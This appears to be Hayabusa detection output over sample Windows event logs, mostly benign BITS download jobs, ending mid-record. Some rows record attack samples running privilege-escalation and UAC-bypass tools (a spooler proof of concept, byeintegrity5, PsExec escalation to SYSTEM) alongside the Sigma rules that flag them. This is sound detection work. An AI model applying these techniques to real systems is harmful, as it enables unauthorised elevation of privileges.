https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1b9S4l.img?w=100&h=100&m=6&tilesize=medium&x=1140&y=780&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-19 19:45:57.562 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aQJnx.img?w=100&h=100&m=6&tilesize=medium&x=1069&y=1223&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-20 02:49:15.102 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-20 02:49:15.960 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-21 20:12:30.660 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-21 20:12:31.102 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-21 20:16:44.077 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Chrome Component Updater : URL: http://storage.googleapis.com/update-delta/mimojjlkmoijpicakmndhoigimigcmbb/32.0.0.453/32.0.0.433/6a7cbd12b20a2b816950c10566b3db00371455731ff01526469af574701da085.crxd,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-21 20:18:47.864 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Chrome Component Updater : URL: http://storage.googleapis.com/update-delta/gcmjkmgdlgnkkcocmoeiminaijmmjnii/9.18.0/9.16.0/ce6075b044b6a23d590819332659310fbc6327480d4ce28d85700575fd1d389b.crxd,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-21 20:19:01.301 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Chrome Component Updater : URL: http://storage.googleapis.com/update-delta/khaoiebndkojlmppeemjhbpbandiljpe/43/42/e0b8b1fb7c27acac43c236b9f6b029b07f2a3b661b5d8eed22848180aaf4f04e.crxd,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-21 20:19:08.126 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Chrome Component Updater : URL: http://redirector.gvt1.com/edgedl/release2/chrome_component/KbGq9i1aCJZgbOKmNv6oJQ_6252/VL8i_VzJSassyW3AF-YJHg,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-21 20:19:17.194 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Chrome Component Updater : URL: http://redirector.gvt1.com/edgedl/release2/chrome_component/ONVXH2AuMZGs-h196MV_Rg_2505/bYFE7q-GLInSBxc008hucw,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-21 20:19:21.164 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Chrome Component Updater : URL: http://redirector.gvt1.com/edgedl/release2/chrome_component/APhHMzuprJvS7ixvnAk_gdI_1/anGnv31dmOJhheXBnYQ3gw,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-21 20:19:25.377 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Chrome Component Updater : URL: http://redirector.gvt1.com/edgedl/release2/chrome_component/AJqZYiqGvCtix64S2N84g-M_2020.11.2.164946/EWvH2e-LS80S29cxzuTfRA,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-21 20:19:34.726 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Chrome Component Updater : URL: http://redirector.gvt1.com/edgedl/release2/chrome_component/Z0dgM6Cm_Rt2z0LEtvtuMA_2020.11.16.1201/AIpG92DElyR2vE9pGKmvVoc,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-21 20:50:16.788 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1begCn.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-21 20:50:17.148 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161351840456_Images/LiveTileImages/MediumAndLarge/Image2.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-22 00:54:58.415 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-22 00:54:59.449 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-22 01:00:56.714 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1bdETn.img?w=100&h=100&m=6&tilesize=medium&x=1080&y=363&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-22 01:00:57.346 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161351840456_Images/LiveTileImages/MediumAndLarge/Image1.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-23 19:46:03.984 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1bgw4d.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-23 19:46:04.676 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161351840456_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-23 19:52:42.355 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-23 19:52:43.097 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-23 20:05:14.300 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1bh3sJ.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-23 21:44:11.565 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Font Download : URL: https://fs.microsoft.com/fs/windows/config.json,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-23 21:46:56.224 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-23 21:46:56.973 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-23 23:09:10.403 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1bhxvH.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-24 00:34:38.147 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1bhAo3.img?w=100&h=100&m=6&tilesize=medium&x=1228&y=258&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-24 00:41:52.668 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1bhEQI.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-24 21:47:56.181 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-24 21:47:57.912 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-25 06:06:52.429 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aV2sK.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-25 08:55:56.229 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1bkiYw.img?w=100&h=100&m=6&tilesize=medium&x=1094&y=441&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-25 18:56:29.274 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Chrome Component Updater : URL: http://storage.googleapis.com/update-delta/gkmgaooipdjhmangpemjhigmamcehddo/86.249.200/84.243.200/17f6e5d11e18da93834a470f7266ede269d3660ac7a4c31c0d0acdb0c4c34ba2.crxd,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-25 18:57:51.221 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Chrome Component Updater : URL: http://redirector.gvt1.com/edgedl/release2/chrome_component/AN67dIUbQty67HoEacsJ61c_6260/APHk7sg8XbALFcVmjTty4CQ,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-25 18:57:59.420 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Chrome Component Updater : URL: http://redirector.gvt1.com/edgedl/release2/chrome_component/Jo7Lnj2MkXB5ezNave49dw_2509/AOHc3HV2drrDzlxLOXeJFhs,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-25 23:04:33.703 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-25 23:04:36.013 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-26 19:44:49.642 +09:00,02694w-win10.threebeesco.com,1,informational,Process Creation,"Command: pocacct.exe payload.dll : Path: C:\Users\lgreen\Downloads\PrivEsc\pocacct.exe : User: 3B\lgreen : Parent Command: ""C:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_sysmon_cve_20201030_spooler.evtx -2020-11-26 19:44:49.642 +09:00,02694w-win10.threebeesco.com,1,medium,Suspicious File Characteristics Due to Missing Fields,,rules/sigma/process_creation/win_susp_file_characteristics.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_sysmon_cve_20201030_spooler.evtx -2020-11-26 19:45:14.007 +09:00,02694w-win10.threebeesco.com,1,informational,Process Creation,Command: C:\WINDOWS\System32\spoolsv.exe : Path: C:\Windows\System32\spoolsv.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\WINDOWS\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_sysmon_cve_20201030_spooler.evtx -2020-11-26 22:23:30.614 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-26 22:23:32.141 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-27 02:38:11.138 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: byeintegrity5-uac.exe : Path: C:\Users\Public\tools\privesc\uac\byeintegrity5-uac.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: ""C:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_uacbypass_CDSSync_schtask_hijack_byeintegrity5.evtx -2020-11-27 02:38:11.138 +09:00,LAPTOP-JU4M3I0E,1,high,Execution from Suspicious Folder,,rules/sigma/process_creation/win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_uacbypass_CDSSync_schtask_hijack_byeintegrity5.evtx -2020-11-27 02:38:11.154 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,Command: taskhostw.exe $(Arg0) : Path: C:\Windows\System32\taskhostw.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: C:\windows\system32\svchost.exe -k netsvcs -p -s Schedule,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_uacbypass_CDSSync_schtask_hijack_byeintegrity5.evtx -2020-11-27 02:38:11.175 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: ""C:\windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: taskhostw.exe $(Arg0)",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_uacbypass_CDSSync_schtask_hijack_byeintegrity5.evtx -2020-11-28 05:15:22.956 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-28 05:15:23.662 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-29 01:17:33.019 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-29 01:17:34.712 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-29 21:31:21.179 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-29 21:31:22.012 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-30 01:29:22.597 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1bsJv4.img?w=100&h=100&m=6&tilesize=medium&x=3175&y=1599&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-30 22:15:33.442 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Font Download : URL: https://fs.microsoft.com/fs/windows/config.json,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-12-05 07:41:04.470 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k localService -p -s RemoteRegistry : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: ?,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_remote_registry_sysmon_1_13_3.evtx -2020-12-05 07:41:04.470 +09:00,MSEDGEWIN10,1,high,Suspicious Svchost Process,,rules/sigma/process_creation/win_susp_svchost.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_remote_registry_sysmon_1_13_3.evtx -2020-12-05 07:41:04.470 +09:00,MSEDGEWIN10,1,low,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation/win_proc_wrong_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_remote_registry_sysmon_1_13_3.evtx -2020-12-05 07:41:04.542 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_remote_registry_sysmon_1_13_3.evtx -2020-12-05 07:41:04.545 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_remote_registry_sysmon_1_13_3.evtx -2020-12-10 01:52:34.562 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Users\Public\psexecprivesc.exe"" C:\Windows\System32\mspaint.exe : Path: C:\Users\Public\psexecprivesc.exe : User: MSEDGEWIN10\user02 : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx -2020-12-10 01:52:34.562 +09:00,MSEDGEWIN10,1,high,Execution from Suspicious Folder,,rules/sigma/process_creation/win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx -2020-12-10 01:52:34.622 +09:00,MSEDGEWIN10,17,low,PsExec Tool Execution,,rules/sigma/pipe_created/pipe_created_tool_psexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx -2020-12-10 01:52:41.861 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\PSEXESVC.exe : Path: C:\Windows\PSEXESVC.exe : User: NT AUTHORITY\SYSTEM : Parent Command: ?,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx -2020-12-10 01:52:41.861 +09:00,MSEDGEWIN10,1,low,PsExec Service Start,,rules/sigma/process_creation/win_psexesvc_start.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx -2020-12-10 01:52:41.861 +09:00,MSEDGEWIN10,1,low,PsExec Tool Execution,,rules/sigma/process_creation/process_creation_tool_psexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx -2020-12-10 01:52:42.478 +09:00,MSEDGEWIN10,18,low,PsExec Tool Execution,,rules/sigma/pipe_created/pipe_created_tool_psexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx -2020-12-10 01:52:44.864 +09:00,MSEDGEWIN10,18,low,PsExec Tool Execution,,rules/sigma/pipe_created/pipe_created_tool_psexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx -2020-12-10 01:52:45.141 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\mspaint.exe"" 췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍 : Path: C:\Windows\System32\mspaint.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\PSEXESVC.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx -2020-12-10 20:18:54.600 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: 